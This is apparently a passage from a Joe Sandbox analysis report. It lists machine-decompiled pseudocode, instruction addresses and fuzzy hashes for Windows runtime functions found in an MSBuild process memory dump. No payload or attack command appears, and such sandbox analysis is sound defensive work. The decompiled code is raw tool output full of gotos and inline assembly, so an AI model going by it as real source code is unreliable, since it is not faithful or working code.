                                            									_t31 = L01024620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                            								}
                                            								if(_t31 == 0) {
                                            									_t30 = 0xc0000017;
                                            								} else {
                                            									goto L9;
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _t30;
                                            			}









                                            0x01011b8f
                                            0x01011b9a
                                            0x01011b9c
                                            0x01011b9e
                                            0x01011ba3
                                            0x01067010
                                            0x01067010
                                            0x00000000
                                            0x01011ba9
                                            0x01011ba9
                                            0x01011bae
                                            0x00000000
                                            0x01011bc5
                                            0x01011bca
                                            0x01011bcf
                                            0x01011bd0
                                            0x01011bd1
                                            0x01011bd2
                                            0x01011bd6
                                            0x01011bdc
                                            0x01011be0
                                            0x01066ffc
                                            0x01067000
                                            0x00000000
                                            0x01067006
                                            0x01067009
                                            0x01067009
                                            0x01011be6
                                            0x01011bec
                                            0x01011c0b
                                            0x01011c0b
                                            0x01011c0c
                                            0x01011c11
                                            0x01011c12
                                            0x01011c15
                                            0x01011c1b
                                            0x01011c1f
                                            0x01011c31
                                            0x01011c33
                                            0x01067026
                                            0x01067026
                                            0x01011c21
                                            0x01011c24
                                            0x01011c24
                                            0x01011bee
                                            0x01011bee
                                            0x01011bf2
                                            0x01011c3a
                                            0x01011bf4
                                            0x01011bf4
                                            0x01011c05
                                            0x01011c05
                                            0x01011c09
                                            0x01011c3e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01011c09
                                            0x01011bec
                                            0x01011be0
                                            0x01011bae
                                            0x01011c2e

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: WindowsExcludedProcs
                                            • API String ID: 0-3583428290
                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                            • Instruction ID: e0548e87590ad8fad4cf8e354e42f4708b9b8ec966536465c993339cfee2e720
                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                            • Instruction Fuzzy Hash: B521F87A50012DEBEB269AA9C880F9F7BADAF44650F054465FF848B204D638DC0087B0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0102F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                            				intOrPtr _t13;
                                            				intOrPtr _t14;
                                            				signed int _t16;
                                            				signed char _t17;
                                            				intOrPtr _t19;
                                            				intOrPtr _t21;
                                            				intOrPtr _t23;
                                            				intOrPtr* _t25;
                                            
                                            				_t25 = _a8;
                                            				_t17 = __ecx;
                                            				if(_t25 == 0) {
                                            					_t19 = 0xc00000f2;
                                            					L8:
                                            					return _t19;
                                            				}
                                            				if((__ecx & 0xfffffffe) != 0) {
                                            					_t19 = 0xc00000ef;
                                            					goto L8;
                                            				}
                                            				_t19 = 0;
                                            				 *_t25 = 0;
                                            				_t21 = 0;
                                            				_t23 = "Actx ";
                                            				if(__edx != 0) {
                                            					if(__edx == 0xfffffffc) {
                                            						L21:
                                            						_t21 = 0x200;
                                            						L5:
                                            						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                            						 *_t25 = _t13;
                                            						L6:
                                            						if(_t13 == 0) {
                                            							if((_t17 & 0x00000001) != 0) {
                                            								 *_t25 = _t23;
                                            							}
                                            						}
                                            						L7:
                                            						goto L8;
                                            					}
                                            					if(__edx == 0xfffffffd) {
                                            						 *_t25 = _t23;
                                            						_t13 = _t23;
                                            						goto L6;
                                            					}
                                            					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                            					 *_t25 = _t13;
                                            					L14:
                                            					if(_t21 == 0) {
                                            						goto L6;
                                            					}
                                            					goto L5;
                                            				}
                                            				_t14 = _a4;
                                            				if(_t14 != 0) {
                                            					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                            					if(_t16 <= 1) {
                                            						_t21 = 0x1f8;
                                            						_t13 = 0;
                                            						goto L14;
                                            					}
                                            					if(_t16 == 2) {
                                            						goto L21;
                                            					}
                                            					if(_t16 != 4) {
                                            						_t19 = 0xc00000f0;
                                            						goto L7;
                                            					}
                                            					_t13 = 0;
                                            					goto L6;
                                            				} else {
                                            					_t21 = 0x1f8;
                                            					goto L5;
                                            				}
                                            			}











                                            0x0102f71d
                                            0x0102f722
                                            0x0102f726
                                            0x01074770
                                            0x0102f765
                                            0x0102f769
                                            0x0102f769
                                            0x0102f732
                                            0x0107477a
                                            0x00000000
                                            0x0107477a
                                            0x0102f738
                                            0x0102f73a
                                            0x0102f73c
                                            0x0102f73f
                                            0x0102f746
                                            0x0102f778
                                            0x0102f7a9
                                            0x0102f7a9
                                            0x0102f754
                                            0x0102f75a
                                            0x0102f75d
                                            0x0102f75f
                                            0x0102f761
                                            0x0102f76f
                                            0x0102f771
                                            0x0102f771
                                            0x0102f76f
                                            0x0102f763
                                            0x00000000
                                            0x0102f763
                                            0x0102f77d
                                            0x0102f7a3
                                            0x0102f7a5
                                            0x00000000
                                            0x0102f7a5
                                            0x0102f77f
                                            0x0102f782
                                            0x0102f784
                                            0x0102f786
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0102f788
                                            0x0102f748
                                            0x0102f74d
                                            0x0102f78d
                                            0x0102f793
                                            0x0102f7b7
                                            0x0102f7bc
                                            0x00000000
                                            0x0102f7bc
                                            0x0102f798
                                            0x00000000
                                            0x00000000
                                            0x0102f79d
                                            0x0102f7b0
                                            0x00000000
                                            0x0102f7b0
                                            0x0102f79f
                                            0x00000000
                                            0x0102f74f
                                            0x0102f74f
                                            0x00000000
                                            0x0102f74f

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            • Opcode ID: 78c7f1d77b1aab18b0013a36957cae8e5fb2e57e1ef2f3e7ac69aa9eee538f9d
                                            • Instruction ID: feb54a1ff32667ae08d53582f2fe8b9eca7a7951a49aa6bab3bde48d8835f98a
                                            • Opcode Fuzzy Hash: 78c7f1d77b1aab18b0013a36957cae8e5fb2e57e1ef2f3e7ac69aa9eee538f9d
                                            • Instruction Fuzzy Hash: DC11B235704A238BEBA54E1DC99073A76F9FB857E4F24457AE9E1CB391DB70C8408340
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 71%
                                            			E010B8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                            				intOrPtr _t35;
                                            				void* _t41;
                                            
                                            				_t40 = __esi;
                                            				_t39 = __edi;
                                            				_t38 = __edx;
                                            				_t35 = __ecx;
                                            				_t34 = __ebx;
                                            				_push(0x74);
                                            				_push(0x10e0d50);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                            				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                            				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                            					E01095720(0x65, 0, "Critical error detected %lx\n", _t35);
                                            					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                            						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                            						asm("int3");
                                            						 *(_t41 - 4) = 0xfffffffe;
                                            					}
                                            				}
                                            				 *(_t41 - 4) = 1;
                                            				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                            				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                            				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                            				 *((intOrPtr*)(_t41 - 0x64)) = L0105DEF0;
                                            				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                            				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                            				_push(_t41 - 0x70);
                                            				L0105DEF0(1, _t38);
                                            				 *(_t41 - 4) = 0xfffffffe;
                                            				return E0105D130(_t34, _t39, _t40);
                                            			}





                                            0x010b8df1
                                            0x010b8df1
                                            0x010b8df1
                                            0x010b8df1
                                            0x010b8df1
                                            0x010b8df1
                                            0x010b8df3
                                            0x010b8df8
                                            0x010b8dfd
                                            0x010b8e00
                                            0x010b8e0e
                                            0x010b8e2a
                                            0x010b8e36
                                            0x010b8e38
                                            0x010b8e3c
                                            0x010b8e46
                                            0x010b8e46
                                            0x010b8e36
                                            0x010b8e50
                                            0x010b8e56
                                            0x010b8e59
                                            0x010b8e5c
                                            0x010b8e60
                                            0x010b8e67
                                            0x010b8e6d
                                            0x010b8e73
                                            0x010b8e74
                                            0x010b8eb1
                                            0x010b8ebd

                                            Strings
                                            • Critical error detected %lx, xrefs: 010B8E21
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Critical error detected %lx
                                            • API String ID: 0-802127002
                                            • Opcode ID: 5b6dbf9d3eee40ce2c311cc0dde8d90da779b259493b3ae2b2571f43c701f725
                                            • Instruction ID: 083b35553337196aa23cd100920c12757403315953e783f8e0df2289d1658d3f
                                            • Opcode Fuzzy Hash: 5b6dbf9d3eee40ce2c311cc0dde8d90da779b259493b3ae2b2571f43c701f725
                                            • Instruction Fuzzy Hash: 05118771D04348EAEF25DFA8C9457DDBBB4BB04310F24825EE5A8AB3A2C3344602CF14
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0109FF60
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                            • API String ID: 0-1911121157
                                            • Opcode ID: 3432f7d8ee0176855556a7ca651ee545a2328f5ffc3d1b02c886eaade9f72785
                                            • Instruction ID: 3759ffda64c387b30fb83136d586a296b30316b910ac77e596832fc2a98f86bb
                                            • Opcode Fuzzy Hash: 3432f7d8ee0176855556a7ca651ee545a2328f5ffc3d1b02c886eaade9f72785
                                            • Instruction Fuzzy Hash: 2611E171510145EFDF62DB54C859FD8BBF1FF04704F148488E688AB5A1C7399940EB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E010D5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                            				signed int _t296;
                                            				signed char _t298;
                                            				signed int _t301;
                                            				signed int _t306;
                                            				signed int _t310;
                                            				signed char _t311;
                                            				intOrPtr _t312;
                                            				signed int _t313;
                                            				void* _t327;
                                            				signed int _t328;
                                            				intOrPtr _t329;
                                            				intOrPtr _t333;
                                            				signed char _t334;
                                            				signed int _t336;
                                            				void* _t339;
                                            				signed int _t340;
                                            				signed int _t356;
                                            				signed int _t362;
                                            				short _t367;
                                            				short _t368;
                                            				short _t373;
                                            				signed int _t380;
                                            				void* _t382;
                                            				short _t385;
                                            				signed short _t392;
                                            				signed char _t393;
                                            				signed int _t395;
                                            				signed char _t397;
                                            				signed int _t398;
                                            				signed short _t402;
                                            				void* _t406;
                                            				signed int _t412;
                                            				signed char _t414;
                                            				signed short _t416;
                                            				signed int _t421;
                                            				signed char _t427;
                                            				intOrPtr _t434;
                                            				signed char _t435;
                                            				signed int _t436;
                                            				signed int _t442;
                                            				signed int _t446;
                                            				signed int _t447;
                                            				signed int _t451;
                                            				signed int _t453;
                                            				signed int _t454;
                                            				signed int _t455;
                                            				intOrPtr _t456;
                                            				intOrPtr* _t457;
                                            				short _t458;
                                            				signed short _t462;
                                            				signed int _t469;
                                            				intOrPtr* _t474;
                                            				signed int _t475;
                                            				signed int _t479;
                                            				signed int _t480;
                                            				signed int _t481;
                                            				short _t485;
                                            				signed int _t491;
                                            				signed int* _t494;
                                            				signed int _t498;
                                            				signed int _t505;
                                            				intOrPtr _t506;
                                            				signed short _t508;
                                            				signed int _t511;
                                            				void* _t517;
                                            				signed int _t519;
                                            				signed int _t522;
                                            				void* _t523;
                                            				signed int _t524;
                                            				void* _t528;
                                            				signed int _t529;
                                            
                                            				_push(0xd4);
                                            				_push(0x10e1178);
                                            				E0105D0E8(__ebx, __edi, __esi);
                                            				_t494 = __edx;
                                            				 *(_t528 - 0xcc) = __edx;
                                            				_t511 = __ecx;
                                            				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                            				 *(_t528 - 0xbc) = __ecx;
                                            				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                            				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                            				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                            				_t427 = 0;
                                            				 *(_t528 - 0x74) = 0;
                                            				 *(_t528 - 0x9c) = 0;
                                            				 *(_t528 - 0x84) = 0;
                                            				 *(_t528 - 0xac) = 0;
                                            				 *(_t528 - 0x88) = 0;
                                            				 *(_t528 - 0xa8) = 0;
                                            				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                            				if( *(_t528 + 0x1c) <= 0x80) {
                                            					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                            					if(__eflags != 0) {
                                            						_t421 = E010D4C56(0, __edx, __ecx, __eflags);
                                            						__eflags = _t421;
                                            						if(_t421 != 0) {
                                            							 *((intOrPtr*)(_t528 - 4)) = 0;
                                            							E0104D000(0x410);
                                            							 *(_t528 - 0x18) = _t529;
                                            							 *(_t528 - 0x9c) = _t529;
                                            							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                            							E010D5542(_t528 - 0x9c, _t528 - 0x84);
                                            						}
                                            					}
                                            					_t435 = _t427;
                                            					 *(_t528 - 0xd0) = _t435;
                                            					_t474 = _t511 + 0x65;
                                            					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                            					_t511 = 0x18;
                                            					while(1) {
                                            						 *(_t528 - 0xa0) = _t427;
                                            						 *(_t528 - 0xbc) = _t427;
                                            						 *(_t528 - 0x80) = _t427;
                                            						 *(_t528 - 0x78) = 0x50;
                                            						 *(_t528 - 0x79) = _t427;
                                            						 *(_t528 - 0x7a) = _t427;
                                            						 *(_t528 - 0x8c) = _t427;
                                            						 *(_t528 - 0x98) = _t427;
                                            						 *(_t528 - 0x90) = _t427;
                                            						 *(_t528 - 0xb0) = _t427;
                                            						 *(_t528 - 0xb8) = _t427;
                                            						_t296 = 1 << _t435;
                                            						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                            						__eflags = _t436 & _t296;
                                            						if((_t436 & _t296) != 0) {
                                            							goto L92;
                                            						}
                                            						__eflags =  *((char*)(_t474 - 1));
                                            						if( *((char*)(_t474 - 1)) == 0) {
                                            							goto L92;
                                            						}
                                            						_t301 =  *_t474;
                                            						__eflags = _t494[1] - _t301;
                                            						if(_t494[1] <= _t301) {
                                            							L10:
                                            							__eflags =  *(_t474 - 5) & 0x00000040;
                                            							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                            								L12:
                                            								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                            								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                            									goto L92;
                                            								}
                                            								_t442 =  *(_t474 - 0x11) & _t494[3];
                                            								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                            								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                            									goto L92;
                                            								}
                                            								__eflags = _t442 -  *(_t474 - 0x11);
                                            								if(_t442 !=  *(_t474 - 0x11)) {
                                            									goto L92;
                                            								}
                                            								L15:
                                            								_t306 =  *(_t474 + 1) & 0x000000ff;
                                            								 *(_t528 - 0xc0) = _t306;
                                            								 *(_t528 - 0xa4) = _t306;
                                            								__eflags =  *0x10f60e8;
                                            								if( *0x10f60e8 != 0) {
                                            									__eflags = _t306 - 0x40;
                                            									if(_t306 < 0x40) {
                                            										L20:
                                            										asm("lock inc dword [eax]");
                                            										_t310 =  *0x10f60e8; // 0x0
                                            										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                            										__eflags = _t311 & 0x00000001;
                                            										if((_t311 & 0x00000001) == 0) {
                                            											 *(_t528 - 0xa0) = _t311;
                                            											_t475 = _t427;
                                            											 *(_t528 - 0x74) = _t427;
                                            											__eflags = _t475;
                                            											if(_t475 != 0) {
                                            												L91:
                                            												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                            												goto L92;
                                            											}
                                            											asm("sbb edi, edi");
                                            											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                            											_t511 = _t498;
                                            											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                            											__eflags =  *(_t312 - 5) & 1;
                                            											if(( *(_t312 - 5) & 1) != 0) {
                                            												_push(_t528 - 0x98);
                                            												_push(0x4c);
                                            												_push(_t528 - 0x70);
                                            												_push(1);
                                            												_push(0xfffffffa);
                                            												_t412 = E01049710();
                                            												_t475 = _t427;
                                            												__eflags = _t412;
                                            												if(_t412 >= 0) {
                                            													_t414 =  *(_t528 - 0x98) - 8;
                                            													 *(_t528 - 0x98) = _t414;
                                            													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                            													 *(_t528 - 0x8c) = _t416;
                                            													 *(_t528 - 0x79) = 1;
                                            													_t511 = (_t416 & 0x0000ffff) + _t498;
                                            													__eflags = _t511;
                                            												}
                                            											}
                                            											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                            											__eflags = _t446 & 0x00000004;
                                            											if((_t446 & 0x00000004) != 0) {
                                            												__eflags =  *(_t528 - 0x9c);
                                            												if( *(_t528 - 0x9c) != 0) {
                                            													 *(_t528 - 0x7a) = 1;
                                            													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                            													__eflags = _t511;
                                            												}
                                            											}
                                            											_t313 = 2;
                                            											_t447 = _t446 & _t313;
                                            											__eflags = _t447;
                                            											 *(_t528 - 0xd4) = _t447;
                                            											if(_t447 != 0) {
                                            												_t406 = 0x10;
                                            												_t511 = _t511 + _t406;
                                            												__eflags = _t511;
                                            											}
                                            											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                            											 *(_t528 - 0x88) = _t427;
                                            											__eflags =  *(_t528 + 0x1c);
                                            											if( *(_t528 + 0x1c) <= 0) {
                                            												L45:
                                            												__eflags =  *(_t528 - 0xb0);
                                            												if( *(_t528 - 0xb0) != 0) {
                                            													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                                            													__eflags = _t511;
                                            												}
                                            												__eflags = _t475;
                                            												if(_t475 != 0) {
                                            													asm("lock dec dword [ecx+edx*8+0x4]");
                                            													goto L100;
                                            												} else {
                                            													_t494[3] = _t511;
                                            													_t451 =  *(_t528 - 0xa0);
                                            													_t427 = E01046DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                                            													 *(_t528 - 0x88) = _t427;
                                            													__eflags = _t427;
                                            													if(_t427 == 0) {
                                            														__eflags = _t511 - 0xfff8;
                                            														if(_t511 <= 0xfff8) {
                                            															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                                            															asm("sbb ecx, ecx");
                                            															__eflags = (_t451 & 0x000000e2) + 8;
                                            														}
                                            														asm("lock dec dword [eax+edx*8+0x4]");
                                            														L100:
                                            														goto L101;
                                            													}
                                            													_t453 =  *(_t528 - 0xa0);
                                            													 *_t494 = _t453;
                                            													_t494[1] = _t427;
                                            													_t494[2] =  *(_t528 - 0xbc);
                                            													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                                            													 *_t427 =  *(_t453 + 0x24) | _t511;
                                            													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                                            													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													__eflags =  *(_t528 + 0x14);
                                            													if( *(_t528 + 0x14) == 0) {
                                            														__eflags =  *[fs:0x18] + 0xf50;
                                            													}
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													asm("movsd");
                                            													__eflags =  *(_t528 + 0x18);
                                            													if( *(_t528 + 0x18) == 0) {
                                            														_t454 =  *(_t528 - 0x80);
                                            														_t479 =  *(_t528 - 0x78);
                                            														_t327 = 1;
                                            														__eflags = 1;
                                            													} else {
                                            														_t146 = _t427 + 0x50; // 0x50
                                            														_t454 = _t146;
                                            														 *(_t528 - 0x80) = _t454;
                                            														_t382 = 0x18;
                                            														 *_t454 = _t382;
                                            														 *((short*)(_t454 + 2)) = 1;
                                            														_t385 = 0x10;
                                            														 *((short*)(_t454 + 6)) = _t385;
                                            														 *(_t454 + 4) = 0;
                                            														asm("movsd");
                                            														asm("movsd");
                                            														asm("movsd");
                                            														asm("movsd");
                                            														_t327 = 1;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 = 0x68;
                                            														 *(_t528 - 0x78) = _t479;
                                            													}
                                            													__eflags =  *(_t528 - 0x79) - _t327;
                                            													if( *(_t528 - 0x79) == _t327) {
                                            														_t524 = _t479 + _t427;
                                            														_t508 =  *(_t528 - 0x8c);
                                            														 *_t524 = _t508;
                                            														_t373 = 2;
                                            														 *((short*)(_t524 + 2)) = _t373;
                                            														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                                            														 *((short*)(_t524 + 4)) = 0;
                                            														_t167 = _t524 + 8; // 0x8
                                            														E0104F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                                            														_t529 = _t529 + 0xc;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                                            														 *(_t528 - 0x78) = _t479;
                                            														_t380 =  *(_t528 - 0x80);
                                            														__eflags = _t380;
                                            														if(_t380 != 0) {
                                            															_t173 = _t380 + 4;
                                            															 *_t173 =  *(_t380 + 4) | 1;
                                            															__eflags =  *_t173;
                                            														}
                                            														_t454 = _t524;
                                            														 *(_t528 - 0x80) = _t454;
                                            														_t327 = 1;
                                            														__eflags = 1;
                                            													}
                                            													__eflags =  *(_t528 - 0xd4);
                                            													if( *(_t528 - 0xd4) == 0) {
                                            														_t505 =  *(_t528 - 0x80);
                                            													} else {
                                            														_t505 = _t479 + _t427;
                                            														_t523 = 0x10;
                                            														 *_t505 = _t523;
                                            														_t367 = 3;
                                            														 *((short*)(_t505 + 2)) = _t367;
                                            														_t368 = 4;
                                            														 *((short*)(_t505 + 6)) = _t368;
                                            														 *(_t505 + 4) = 0;
                                            														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                                            														_t327 = 1;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 = _t479 + _t523;
                                            														 *(_t528 - 0x78) = _t479;
                                            														__eflags = _t454;
                                            														if(_t454 != 0) {
                                            															_t186 = _t454 + 4;
                                            															 *_t186 =  *(_t454 + 4) | 1;
                                            															__eflags =  *_t186;
                                            														}
                                            														 *(_t528 - 0x80) = _t505;
                                            													}
                                            													__eflags =  *(_t528 - 0x7a) - _t327;
                                            													if( *(_t528 - 0x7a) == _t327) {
                                            														 *(_t528 - 0xd4) = _t479 + _t427;
                                            														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                                            														E0104F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                                            														_t529 = _t529 + 0xc;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 =  *(_t528 - 0x78) + _t522;
                                            														 *(_t528 - 0x78) = _t479;
                                            														__eflags = _t505;
                                            														if(_t505 != 0) {
                                            															_t199 = _t505 + 4;
                                            															 *_t199 =  *(_t505 + 4) | 1;
                                            															__eflags =  *_t199;
                                            														}
                                            														_t505 =  *(_t528 - 0xd4);
                                            														 *(_t528 - 0x80) = _t505;
                                            													}
                                            													__eflags =  *(_t528 - 0xa8);
                                            													if( *(_t528 - 0xa8) != 0) {
                                            														_t356 = _t479 + _t427;
                                            														 *(_t528 - 0xd4) = _t356;
                                            														_t462 =  *(_t528 - 0xac);
                                            														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                                            														_t485 = 0xc;
                                            														 *((short*)(_t356 + 2)) = _t485;
                                            														 *(_t356 + 6) = _t462;
                                            														 *((short*)(_t356 + 4)) = 0;
                                            														_t211 = _t356 + 8; // 0x9
                                            														E0104F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                                            														E0104FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                                            														_t529 = _t529 + 0x18;
                                            														_t427 =  *(_t528 - 0x88);
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t505 =  *(_t528 - 0xd4);
                                            														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                                            														 *(_t528 - 0x78) = _t479;
                                            														_t362 =  *(_t528 - 0x80);
                                            														__eflags = _t362;
                                            														if(_t362 != 0) {
                                            															_t222 = _t362 + 4;
                                            															 *_t222 =  *(_t362 + 4) | 1;
                                            															__eflags =  *_t222;
                                            														}
                                            													}
                                            													__eflags =  *(_t528 - 0xb0);
                                            													if( *(_t528 - 0xb0) != 0) {
                                            														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                                            														_t458 = 0xb;
                                            														 *((short*)(_t479 + _t427 + 2)) = _t458;
                                            														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                                            														 *((short*)(_t427 + 4 + _t479)) = 0;
                                            														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                                            														E0104FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                                            														_t529 = _t529 + 0xc;
                                            														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                                            														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                                            														 *(_t528 - 0x78) = _t479;
                                            														__eflags = _t505;
                                            														if(_t505 != 0) {
                                            															_t241 = _t505 + 4;
                                            															 *_t241 =  *(_t505 + 4) | 1;
                                            															__eflags =  *_t241;
                                            														}
                                            													}
                                            													_t328 =  *(_t528 + 0x1c);
                                            													__eflags = _t328;
                                            													if(_t328 == 0) {
                                            														L87:
                                            														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                                            														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                                            														_t455 =  *(_t528 - 0xdc);
                                            														 *(_t427 + 0x14) = _t455;
                                            														_t480 =  *(_t528 - 0xa0);
                                            														_t517 = 3;
                                            														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                                            														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                                            															asm("rdtsc");
                                            															 *(_t427 + 0x3c) = _t480;
                                            														} else {
                                            															 *(_t427 + 0x3c) = _t455;
                                            														}
                                            														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                                            														_t456 =  *[fs:0x18];
                                            														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                                            														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                                            														_t427 = 0;
                                            														__eflags = 0;
                                            														_t511 = 0x18;
                                            														goto L91;
                                            													} else {
                                            														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                                            														__eflags = _t519;
                                            														 *(_t528 - 0x8c) = _t328;
                                            														do {
                                            															_t506 =  *((intOrPtr*)(_t519 - 4));
                                            															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                                            															 *(_t528 - 0xd4) =  *(_t519 - 8);
                                            															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                                            															__eflags =  *(_t333 + 0x36) & 0x00004000;
                                            															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                                            																_t334 =  *_t519;
                                            															} else {
